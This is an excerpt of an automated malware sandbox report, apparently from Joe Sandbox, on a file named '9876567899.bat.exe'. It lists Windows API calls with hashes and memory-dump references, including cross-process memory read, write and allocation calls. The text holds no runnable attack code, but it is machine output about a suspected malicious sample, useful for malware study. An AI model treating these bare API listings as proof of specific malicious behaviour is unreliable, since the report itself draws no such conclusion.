                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 842720411-0
                                                                • Opcode ID: 8f09c2b92b1e50f50cb31fd749957f6f01e7b7d453fd34dc5a7cf4e4720810cb
                                                                • Instruction ID: c960b6721a75f1b66d723341ca3091e1be999c208ab9a436159d755fc26809b7
                                                                • Opcode Fuzzy Hash: 8f09c2b92b1e50f50cb31fd749957f6f01e7b7d453fd34dc5a7cf4e4720810cb
                                                                • Instruction Fuzzy Hash: 17011975200209BFDB124FA9DC59A6A3B6EEFCA3A0B608419FA45D7360DA35DD009F64
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00770FCA
                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00770FD6
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00770FE5
                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00770FEC
                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00771002
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: c84b9f9112ddd362d23c68a5d5b12e06629704078015a9a5ada51348eddd64fe
                                                                • Instruction ID: b055de372fca47096504a2e6dbc4f591dc2f7294cf93cd6cc5555b26eeecb0b7
                                                                • Opcode Fuzzy Hash: c84b9f9112ddd362d23c68a5d5b12e06629704078015a9a5ada51348eddd64fe
                                                                • Instruction Fuzzy Hash: E9F04975200305BBDB224FA8DC4AF573BADEFCA7A2F508414FA49C6251DE78DC50CA60
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0077102A
                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00771036
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771045
                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0077104C
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771062
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: 3fbfc60b5aa9ab7833dea4a31f4f01cd5fafe612dd1ba8d0895886fcc9bf9ef3
                                                                • Instruction ID: 9ffa0270f2a9dc9731848d2d9b7903a26368646768462ebe5e871ad0ca6e6538
                                                                • Opcode Fuzzy Hash: 3fbfc60b5aa9ab7833dea4a31f4f01cd5fafe612dd1ba8d0895886fcc9bf9ef3
                                                                • Instruction Fuzzy Hash: 1CF03775200305BBDB225FA8EC49A563BADEF8A6A1F508414FA4986250DA78D8508A60
                                                                APIs
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780324
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780331
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 0078033E
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 0078034B
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780358
                                                                • CloseHandle.KERNEL32(?,?,?,?,0078017D,?,007832FC,?,00000001,00752592,?), ref: 00780365
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: a1dd6b7a2562ecc66a26464acf587d65669c6cba39b52378367a88d64a27ab17
                                                                • Instruction ID: 4278d09b166396528bf5fb1deac67c3ff72df9a38201d529b9aa2a1336a10f3e
                                                                • Opcode Fuzzy Hash: a1dd6b7a2562ecc66a26464acf587d65669c6cba39b52378367a88d64a27ab17
                                                                • Instruction Fuzzy Hash: B501AA72801B15DFCB30AF66D880812FBF9BF603153158A3FD1A692931C7B5A998DF80
                                                                APIs
                                                                • _free.LIBCMT ref: 0074D752
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 0074D764
                                                                • _free.LIBCMT ref: 0074D776
                                                                • _free.LIBCMT ref: 0074D788
                                                                • _free.LIBCMT ref: 0074D79A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 1ed2ef87f7952582b06e7fa24c89eeb3af820dde89be3e4b5f78d11d7c739a0f
                                                                • Instruction ID: ec6f8f4b9bf33524adf3adef0e2584a4453a8aec0bb6ef1bc94fcb935d3dd295
                                                                • Opcode Fuzzy Hash: 1ed2ef87f7952582b06e7fa24c89eeb3af820dde89be3e4b5f78d11d7c739a0f
                                                                • Instruction Fuzzy Hash: 93F01232545205AB9633EB65F9C5C167BEDBB447107D54C06F088E7512C73CFC908A64
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00775C58
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00775C6F
                                                                • MessageBeep.USER32(00000000), ref: 00775C87
                                                                • KillTimer.USER32(?,0000040A), ref: 00775CA3
                                                                • EndDialog.USER32(?,00000001), ref: 00775CBD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                • String ID:
                                                                • API String ID: 3741023627-0
                                                                • Opcode ID: e4ee66bec887d26b28aa99b459cd0f80aa01c7ad18a78a3275d30c147e812468
                                                                • Instruction ID: da582877b8aed7f676cd6d77dd1810d49af0fe77c94136bebdd9266743ec1f19
                                                                • Opcode Fuzzy Hash: e4ee66bec887d26b28aa99b459cd0f80aa01c7ad18a78a3275d30c147e812468
                                                                • Instruction Fuzzy Hash: 0F018130500B05ABEF229B10DD4EFA677B8BB41B45F049569A587A10E1DBF8A9848AA4
                                                                APIs
                                                                • _free.LIBCMT ref: 007422BE
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 007422D0
                                                                • _free.LIBCMT ref: 007422E3
                                                                • _free.LIBCMT ref: 007422F4
                                                                • _free.LIBCMT ref: 00742305
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 21ce87950c1e94388ac6635b4797d6af451f7902e97af4886dc00645677d6ccd
                                                                • Instruction ID: aa4126a23027dc76d42fda70bb528be4c09cd17f221a1029c461069e8902e76a
                                                                • Opcode Fuzzy Hash: 21ce87950c1e94388ac6635b4797d6af451f7902e97af4886dc00645677d6ccd
                                                                • Instruction Fuzzy Hash: CDF03A709021A19B9A13AF55BC8680C3B68F71C760781850BF410EA2B2C77D2873EFEC
                                                                APIs
                                                                • EndPath.GDI32(?), ref: 007295D4
                                                                • StrokeAndFillPath.GDI32(?,?,007671F7,00000000,?,?,?), ref: 007295F0
                                                                • SelectObject.GDI32(?,00000000), ref: 00729603
                                                                • DeleteObject.GDI32 ref: 00729616
                                                                • StrokePath.GDI32(?), ref: 00729631
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                • String ID:
                                                                • API String ID: 2625713937-0
                                                                • Opcode ID: cfaa1e1d0ad170192dfcbee496248f0e4741dbfea55e267cf21a96eecae9597f
                                                                • Instruction ID: e8fc2614c2ad8cbdbdc29e75b13cc9162f029d6e8b366f1a9607001f41247d9f
                                                                • Opcode Fuzzy Hash: cfaa1e1d0ad170192dfcbee496248f0e4741dbfea55e267cf21a96eecae9597f
                                                                • Instruction Fuzzy Hash: D6F03C30006288EBDB135F65ED5D7A53BA1AB46322F48C214F525590F2DB3C99A1DF28
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: __freea$_free
                                                                • String ID: a/p$am/pm
                                                                • API String ID: 3432400110-3206640213
                                                                • Opcode ID: e43ad88c79126362eedff591aaeced324cca744c88659b5191a0f09e99e2e7bf
                                                                • Instruction ID: a3e4aaac37e706634ee21717f47f2cc24499652aa2c23d7ae5809e699cced3c7
                                                                • Opcode Fuzzy Hash: e43ad88c79126362eedff591aaeced324cca744c88659b5191a0f09e99e2e7bf
                                                                • Instruction Fuzzy Hash: E3D12631A1020ACADB24BF68C895BFEBBB0FF06700FA44159E915AB651D37D9DC0CB91
                                                                APIs
                                                                  • Part of subcall function 00730242: EnterCriticalSection.KERNEL32(007E070C,007E1884,?,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073024D
                                                                  • Part of subcall function 00730242: LeaveCriticalSection.KERNEL32(007E070C,?,0072198B,007E2518,?,?,?,007112F9,00000000), ref: 0073028A
                                                                  • Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9
                                                                • __Init_thread_footer.LIBCMT ref: 00796238
                                                                  • Part of subcall function 007301F8: EnterCriticalSection.KERNEL32(007E070C,?,?,00728747,007E2514), ref: 00730202
                                                                  • Part of subcall function 007301F8: LeaveCriticalSection.KERNEL32(007E070C,?,00728747,007E2514), ref: 00730235
                                                                  • Part of subcall function 0078359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007835E4
                                                                  • Part of subcall function 0078359C: LoadStringW.USER32(007E2390,?,00000FFF,?), ref: 0078360A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                • String ID: x#~$x#~$x#~
                                                                • API String ID: 1072379062-2863289283
                                                                • Opcode ID: 913643103220ab5bf2dfba791544ff30417b77308633f75498b87070fac47ad2
                                                                • Instruction ID: eafce2cd303131ee20826498f8160389b73c3ed681582683a724d9f939c552ad
                                                                • Opcode Fuzzy Hash: 913643103220ab5bf2dfba791544ff30417b77308633f75498b87070fac47ad2
                                                                • Instruction Fuzzy Hash: 59C17B71A00105EBCF14DF98D895EAEB7B9FF48300F118169E9059B291DB78EE55CBA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JOq
                                                                • API String ID: 0-3534734180
                                                                • Opcode ID: e4678fa9163d5b08d7a1d883f3fc0505f1960f44e12959e7dd3353cac585b17d
                                                                • Instruction ID: 063e01e8f0fdc428b25bb58e86d10e27447b6ccd27855c5071f4eafcac0cba55
                                                                • Opcode Fuzzy Hash: e4678fa9163d5b08d7a1d883f3fc0505f1960f44e12959e7dd3353cac585b17d
                                                                • Instruction Fuzzy Hash: 9451A0B1E0060AEFDB119FA4C889FAEBBB8EF45310F14015AF405A7293D77D9901CB61
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00748B6E
                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00748B7A
                                                                • __dosmaperr.LIBCMT ref: 00748B81
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                • String ID: .s
                                                                • API String ID: 2434981716-1621786184
                                                                • Opcode ID: d5ef8f52ef2e641989797162c82c2e270fd3fb75832694c9bfaa1fde14e96f2a
                                                                • Instruction ID: eb9c0f856505561f43bf5fe67708360ff636d3c5059cde2aa50ca550a901da69
                                                                • Opcode Fuzzy Hash: d5ef8f52ef2e641989797162c82c2e270fd3fb75832694c9bfaa1fde14e96f2a
                                                                • Instruction Fuzzy Hash: B8418CF060404DAFDB659F24C884A7D7FA5EB86314F2881AAF8948B242DF798C42D795
                                                                APIs
                                                                  • Part of subcall function 0077B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007721D0,?,?,00000034,00000800,?,00000034), ref: 0077B42D
                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00772760
                                                                  • Part of subcall function 0077B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0077B3F8
                                                                  • Part of subcall function 0077B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0077B355
                                                                  • Part of subcall function 0077B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00772194,00000034,?,?,00001004,00000000,00000000), ref: 0077B365
                                                                  • Part of subcall function 0077B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00772194,00000034,?,?,00001004,00000000,00000000), ref: 0077B37B
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007727CD
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0077281A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                • String ID: @
                                                                • API String ID: 4150878124-2766056989
                                                                • Opcode ID: 23bb8b71d85cd8879e65ab9d210f2e8b9a6e5facb30b5e42597ee6e36c200bfa
                                                                • Instruction ID: c78681f9650acc9ec7070a88361db9ef1fbc1b9e2d3ab878026e1fae3879c0d9
                                                                • Opcode Fuzzy Hash: 23bb8b71d85cd8879e65ab9d210f2e8b9a6e5facb30b5e42597ee6e36c200bfa
                                                                • Instruction Fuzzy Hash: FB412A72900218AFDF10DBA4CD45BEEBBB8EF09740F008095FA59B7181DB756E85CBA1
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9876567899.bat.exe,00000104), ref: 00741769
                                                                • _free.LIBCMT ref: 00741834
                                                                • _free.LIBCMT ref: 0074183E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Users\user\Desktop\9876567899.bat.exe
                                                                • API String ID: 2506810119-2253961750
                                                                • Opcode ID: 9903ab0c4833eb62d778178da8a0d9092c6e3bd82f8b62330502d2e225b1aedc
                                                                • Instruction ID: 42ecaecbe6d13cd91172d1e9b3cf9887c452aa4d6882d5d7741e57c9efae8f25
                                                                • Opcode Fuzzy Hash: 9903ab0c4833eb62d778178da8a0d9092c6e3bd82f8b62330502d2e225b1aedc
                                                                • Instruction Fuzzy Hash: 77318271A40258EFDB22EB99DC85D9EBBFCEB89310B944166F504DB211D7784E80CB90
                                                                APIs
                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0077C306
                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 0077C34C
                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007E1990,012F55D0), ref: 0077C395
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$Delete$InfoItem
                                                                • String ID: 0
                                                                • API String ID: 135850232-4108050209
                                                                • Opcode ID: 7fe1bfeb7e3147d4b26451bb72c416c2a53689bcb75bd5ea6992520e9943b5fe
                                                                • Instruction ID: 4737767276df15b6840c2ad0672327837c2f12177ae254941f3ee5680d9bd4e8
                                                                • Opcode Fuzzy Hash: 7fe1bfeb7e3147d4b26451bb72c416c2a53689bcb75bd5ea6992520e9943b5fe
                                                                • Instruction Fuzzy Hash: C9418071204301DFDB21DF25D885B5ABBE4AF89360F14C61DF9A9972D1D738A904CB62
                                                                APIs
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007ACC08,00000000,?,?,?,?), ref: 007A44AA
                                                                • GetWindowLongW.USER32 ref: 007A44C7
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A44D7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Long
                                                                • String ID: SysTreeView32
                                                                • API String ID: 847901565-1698111956
                                                                • Opcode ID: 35fc212d16b9ba6e3fb0883bdc34107300583c0069bcf6936e15d10f309bb1f4
                                                                • Instruction ID: 41c858362b6291223d97be3651dbd60a672dfadb6e35541803954c5e21f352b7
                                                                • Opcode Fuzzy Hash: 35fc212d16b9ba6e3fb0883bdc34107300583c0069bcf6936e15d10f309bb1f4
                                                                • Instruction Fuzzy Hash: 9831AD71200245AFDB218F78DC45BEA77A9EB8A334F204725F975921D0D7B9EC509B50
